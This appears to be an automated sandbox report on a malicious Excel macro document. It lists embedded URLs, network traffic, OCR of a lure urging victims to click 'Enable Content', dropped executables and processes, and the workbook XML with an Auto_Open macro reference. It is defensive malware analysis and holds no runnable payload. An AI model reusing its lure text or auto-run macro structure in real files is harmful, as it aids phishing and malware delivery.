Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://graph.windows.net
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://graph.windows.net/
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://login.windows.local
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://management.azure.com
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://management.azure.com/
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://messaging.office.com/
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://ncus-000.contentsync.
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://ncus-000.pagecontentsync.
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://officeapps.live.com
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://onedrive.live.com
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://outlook.office.com/
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: https://rca.e-szigno.hu/ocsp0-
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: https://repository.luxtrust.lu0
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://settings.outlook.com
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://store.office.com/addinstemplate
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://tasks.office.com
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://templatelogging.office.com/client/log
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: https://web.certicamara.com/marco-legal0Z
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://wus2-000.contentsync.
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://wus2-000.pagecontentsync.
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: https://www.anf.es/AC/ACTAS/789230
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: https://www.anf.es/AC/ANFServerCA.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: https://www.anf.es/address/)1(0&
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: https://www.catcert.net/verarrel
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: https://www.catcert.net/verarrel05
Source: fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: https://www.netlock.hu/docs/
Source: fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: https://www.netlock.net/docs
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: https://www.odwebp.svc.ms
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: https://wwww.certigna.fr/autorites/0m

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443

Source: unknown

HTTPS traffic detected: 50.87.232.245:443 -> 192.168.2.3:49722 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Source: fdcbn.exe, 00000001.00000002.252447191.0000023606250000.00000002.00000001.sdmp

Binary or memory string: GetRawInputData

Source: Yara match	File source: Process Memory Space: fdcbn.exe PID: 4872, type: MEMORY
Source: Yara match	File source: Process Memory Space: fdcbn.exe PID: 5384, type: MEMORY

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: Enable Editing" 11_ from the yellow bar above 12 13_ Once You have Enable Editing, please click "
Source: Screenshot number: 4	Screenshot OCR: Enable Content" 14 from the yellow bar above 15 16 17 18" WHY I CANNOT OPEN THIS DOCUMENT? 19
Source: Screenshot number: 8	Screenshot OCR: Enable Content O X A Share ::u':Sum " Zy JO Sort & Find & CL C ear FI ter Sc ect Editing ^ X

Found Excel 4.0 Macro with suspicious formulas

Show sources

Source: request_form_1611565093.xlsm

Initial sample: CALL

Office process drops PE file

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\msdownld.tmp\AS01A87F.tmp\victory.php	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\9ght3erd[1].exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\30ght3erd[1].exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\otrgh\sdgvjk\fdcbn.exe	Jump to dropped file

Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645C2AF0
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645C1780
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645BB780
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645BB980
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645C0980
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645CA980
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645E3560
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645E4F70
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645CBB70
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B7350
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645BA730
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645C1330
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645C2330
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645C1C00
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B9C00
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B8800
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B1000
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645FE210
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645BDFC2
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF764604B98
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645BA080
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645FF090
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B468D
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B9460
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B5E40
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645BB050
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645FDE50
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B124B
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645BAC30
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645C3710
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B2F10
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645E92D0
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B32A0
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645CA0A0
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B52B0

Source: workbook.xml

Binary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"><fileVersion appName="xl" lastEdited="5" lowestEdited="4" rupBuild="9303"/><workbookPr filterPrivacy="1" defaultThemeVersion="124226"/><bookViews><workbookView xWindow="240" yWindow="105" windowWidth="14805" windowHeight="8010"/></bookViews><sheets><sheet name="DocuSign" sheetId="5" r:id="rId1"/><sheet name="Doc1" sheetId="4" r:id="rId2"/><sheet name="Doc2" sheetId="3" r:id="rId3"/></sheets><functionGroups builtInGroupCount="17"/><definedNames><definedName name="dontdoit" function="1" xlm="1" functionGroupId="9">-676986879</definedName><definedName name="okwell" function="1" xlm="1" functionGroupId="9">124715010</definedName><definedName name="plzno" function="1" xlm="1" functionGroupId="9">-709623808</definedName><definedName name="_xlnm.Auto_Open">'Doc1'!$AA$6</definedName></definedNames><calcPr calcId="122211"/></workbook>

Source: fdcbn.exe, 00000001.00000002.253215972.00000236063F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504300437.000001DEF0E20000.00000002.00000001.sdmp

Binary or memory string: FPicturesVideosCommunicationsInternetUsersLibrariesUserFilesDocumentsCompressedFolder@shell32.dll,-34829@shell32.dll,-34830@shell32.dll,-34831@shell32.dll,-34832@shell32.dll,-34824@shell32.dll,-34825@shell32.dll,-34826@shell32.dll,-34827@shell32.dll,-34820@shell32.dll,-34821@shell32.dll,-34822@shell32.dll,-34823OpenSearch@shell32.dll,-34817@shell32.dll,-34818@shell32.dll,-34819@shell32.dll,-34828@shell32.dll,-34837@shell32.dll,-34838@shell32.dll,-34836@shell32.dll,-34839@shell32.dll,-34840@shell32.dll,-34835AppJscriptJavascriptResLDAPFileExplorer.ZipSelectionIerssIehistoryExplorer.BurnSelectionExplorer.AssocProtocol.search-msExplorer.EraseDiscExplorer.CloseSessionExplorer.AssocActionId.CloseSessionExplorer.AssocActionId.BurnSelectionExplorer.AssocActionId.ZipSelectionExplorer.AssocActionId.EraseDisc.appref-ms.application.bas.asp.adeWMP11.AssocProtocol.MMS.app.adpwindowsmediacenterappVbscriptwindowsmediacenterwebwindowsmediacentersslStickyNotesrlogintn3270telnet.hta.hpj.isp.ins.grp.gadget.hme.hlp.crt.crds.fxp.csh.cpf.cnt.crd.cpl.maw.mav.mda.mcf.mas.mar.mau.mat.mag.maf.maq.mam.jse.its.mad.ksh.pcd.ops.plg.pl.msh2xml.msh2.mst.mshxml.msh.msc.msh1xml.msh1.mdt.mde.mdz.mdw.rbw.rb.rgu.rdp.pyo.pyc.plsc.pvw.ps2xml.ps2.py.psc2.prg.prf.provxml.printerexport.wsc.ws.xaml.wsh.vsmacros.vbp.webpnp.vsw.tsk.theme.vbe.vb.scr.scf.shs.shb.xip.xdp.xnk`

Source: classification engine

Classification label: mal80.expl.evad.winXLSM@5/15@1/4

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache

Jump to behavior

Source: C:\otrgh\sdgvjk\fdcbn.exe

Mutant created: \Sessions\1\BaseNamedObjects\DOBLRPWBUQFD

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\{A6CD0287-F39E-46CD-979D-EA2876FB904D} - OProcSessId.dat

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\otrgh\sdgvjk\fdcbn.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\otrgh\sdgvjk\fdcbn.exe 'C:\otrgh\sdgvjk\fdcbn.exe'
Source: unknown	Process created: C:\otrgh\sdgvjk\fdcbn.exe 'C:\otrgh\sdgvjk\fdcbn.exe'
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\otrgh\sdgvjk\fdcbn.exe 'C:\otrgh\sdgvjk\fdcbn.exe'
Source: C:\otrgh\sdgvjk\fdcbn.exe	Process created: C:\otrgh\sdgvjk\fdcbn.exe 'C:\otrgh\sdgvjk\fdcbn.exe'

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: request_form_1611565093.xlsm	Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: request_form_1611565093.xlsm	Initial sample: OLE zip file path = xl/media/image1.png
Source: request_form_1611565093.xlsm	Initial sample: OLE zip file path = xl/media/image2.png
Source: request_form_1611565093.xlsm	Initial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
Source: request_form_1611565093.xlsm	Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Source:	Binary string: kernel32.pdbUGP source: fdcbn.exe, 00000001.00000002.251787155.0000023605F60000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.501537228.000001DEF09A0000.00000002.00000001.sdmp
Source:	Binary string: dnsapi.pdbUGP source: fdcbn.exe, 00000001.00000002.251864694.0000023606010000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.501906744.000001DEF0A50000.00000002.00000001.sdmp
Source:	Binary string: wininet.pdb source: fdcbn.exe, 00000001.00000002.259081379.00000236079B0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.508856779.000001DEF23E0000.00000002.00000001.sdmp
Source:	Binary string: ws2_32.pdb source: fdcbn.exe, 00000001.00000002.252045574.00000236061B0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504093786.000001DEF0DB0000.00000002.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: fdcbn.exe, 00000001.00000002.251361547.0000023605B70000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.499969051.000001DEEEC10000.00000002.00000001.sdmp
Source:	Binary string: D:\projects\source\repos\7\dl7\Bin\x64\Release_nologs\qitx64.pdb(7`d source: fdcbn.exe, 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp, fdcbn.exe, 00000003.00000002.510687772.00007FF76460E000.00000002.00020000.sdmp
Source:	Binary string: D:\projects\source\repos\7\dl7\Bin\x64\Release_nologs\qitx64.pdb source: fdcbn.exe, 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp, fdcbn.exe, 00000003.00000002.510687772.00007FF76460E000.00000002.00020000.sdmp, 9ght3erd[1].exe.0.dr
Source:	Binary string: Dw=helpvolumelabelmasteredudfUDFJOLIETItemPosItemOrder%s (%d).%sData\Program Files\Data\Windows\Program Files\Data\Program Files (x86)\Data\ProgramData\.cdxml.cer.automaticdestinations-ms.cat.dmp.cookie.customdestinations-msWindows\$Windows.~BT\Program Files (x86)\ProgramData\.appxbundle.appxpackageWindows.old\.appx.msip.msm.ocx.olb.mui.nst.etl.fon.dsft.efi.mpb.mp.partial.pdb.p7s.p7x.pfx.pem.pfm.p10.p12.ost.otf.p7m.p7r.p7b.p7c.sys.ttc.spkg.sst.vmrs.vsi.vmcx.psd1.psf.sft.spc.rll.wim.winmd.vsix.wfsWININET.xap\shellL source: fdcbn.exe, 00000001.00000002.253215972.00000236063F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504300437.000001DEF0E20000.00000002.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: fdcbn.exe, 00000001.00000002.251576617.0000023605D80000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.501200537.000001DEF07C0000.00000002.00000001.sdmp
Source:	Binary string: ole32.pdbUGP source: fdcbn.exe, 00000001.00000002.258877953.0000023607860000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.508687761.000001DEF2290000.00000002.00000001.sdmp
